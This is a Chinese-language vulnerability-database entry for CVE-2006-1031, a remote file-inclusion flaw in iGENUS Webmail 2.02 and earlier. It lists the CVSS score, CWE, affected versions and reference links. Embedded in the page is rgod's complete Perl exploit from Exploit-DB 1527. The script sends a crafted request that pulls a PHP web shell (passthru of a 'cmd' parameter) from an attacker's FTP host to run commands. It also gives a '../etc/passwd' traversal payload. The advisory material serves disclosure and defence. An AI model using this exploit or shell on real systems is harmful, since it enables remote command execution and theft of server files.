CVE-2006-1031
CVSS7.5
发布时间 :2006-03-07 06:02:00
修订时间 :2011-08-23 00:00:00
NMCOE    

[原文]config/config_inc.php in iGENUS Webmail 2.02 and earlier allows remote attackers to include arbitrary local files via the SG_HOME parameter.


[CNNVD]iGenus WebMail 'Config_Inc.PHP'远程问题包含漏洞(CNNVD-200603-111)

        在iGENUS Webmail 2.02及其早期版本中的config/config_inc.php,允许远程攻击者通过SG_HOME参数,包含任意本地文件。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-94 [对生成代码的控制不恰当(代码注入)]

- CPE (受影响的平台与产品)

cpe:/a:igenus:igenus_webmail:2.0
cpe:/a:igenus:igenus_webmail:2.01
cpe:/a:igenus:igenus_webmail:2.02

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1031
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1031
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-111
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/24935
(UNKNOWN)  XF  igenus-sg-home-file-include(24935)
http://www.vupen.com/english/advisories/2006/0753
(VENDOR_ADVISORY)  VUPEN  ADV-2006-0753
http://www.securityfocus.com/bid/16829
(UNKNOWN)  BID  16829
http://www.osvdb.org/23530
(UNKNOWN)  OSVDB  23530
http://secunia.com/advisories/19036
(VENDOR_ADVISORY)  SECUNIA  19036
http://retrogod.altervista.org/igenus_202_xpl_pl.html
(UNKNOWN)  MISC  http://retrogod.altervista.org/igenus_202_xpl_pl.html

- 漏洞信息

iGenus WebMail 'Config_Inc.PHP'远程问题包含漏洞
高危 代码注入
2006-03-07 00:00:00 2007-08-27 00:00:00
远程  
        在iGENUS Webmail 2.02及其早期版本中的config/config_inc.php,允许远程攻击者通过SG_HOME参数,包含任意本地文件。

- 公告与补丁

        目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本.

- 漏洞信息 (1527)

iGENUS WebMail <= 2.0.2 (config_inc.php) Remote Code Execution Exploit (EDBID:1527)
php webapps
2006-02-25 Verified
0 rgod
N/A [点击下载]
#!/usr/bin/perl
use IO::Socket;

print "______________________________________________________\r\n";
print "iGENUS WebMail <= 2.0.2 remote commads xctn\r\n";
print "-> works against PHP5 with register_globals = On\r\n";
print "   & allow_url_fopen = On\r\n";
print "by rgod rgod<AT>autistici<DOT>org\r\n";
print "site: http://retrogod.altervista.org\r\n\r\n";
print "dork:  intitle:\"igenus webmail login\"\r\n";
print "______________________________________________________\r\n";

sub main::urlEncode {
    my ($string) = @_;
    $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
    #$string# =~ tr/.//;
    return $string;
 }

$serv=$ARGV[0];
$path=$ARGV[1];
$loc=urlEncode($ARGV[2]);
$cmd=""; for ($i=3; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};

if (@ARGV < 4)
{
print "\r\nUsage:\r\n";
print "perl igenus_xpl.pl SERVER PATH FTP_LOCATION COMMAND\r\n\r\n";
print "SERVER         - Server where iGENUS is installed.\r\n";
print "PATH           - Path to iGENUS (ex: /igenus/ or just /) \r\n";
print "FTP_LOCATION   - an FTP site with the code to include\r\n";
print "COMMAND        - a Unix command\r\n\r\n";
print "Example:\r\n";
print "perl igenus_xpl.pl localhost /igenus/ ftp://username:password/somehost.com ls -la\r\n";
print "perl igenus_xpl.pl localhost /igenus/ ftp://username:password/somehost.com/subdir cat config_inc.php\r\n\r\n";
print "note: on ftp location you need this code in .config :\r\n";
print "<?php ob_clean();ini_set(\"max_execution_time\",0);passthru(\$_GET[\"cmd\"]);die;?>\r\n\r\n";
exit();
}

  $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout  => 10, PeerPort=>"http(80)")
  or die "[+] Connecting ... Could not connect to host.\n\n";
  print $sock "GET ".$path."config/config_inc.php?cmd=".$cmd."&SG_HOME=".$loc." HTTP/1.1\r\n";
  print $sock "Host: ".$serv."\r\n";
  print $sock "Connection: close\r\n\r\n";

  while ($answer = <$sock>) {
    print $answer;
  }
  close($sock);

# ----------------> also, with magic_quotes_gpc = Off, try this:
# http://[target]/[path]/?Lang=../../../../../../../../etc/passwd%00

# milw0rm.com [2006-02-25]
		

- 漏洞信息

23530
iGENUS Webmail config_inc.php SG_HOME Parameter Local File Inclusion
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

iGENUS Webmail contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config_inc.php script not properly sanitizing user input supplied to the 'SG_HOME' variable. This may allow an attacker to include or read arbitrary local files.

- 时间线

2006-02-27 Unknow
2006-02-27 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站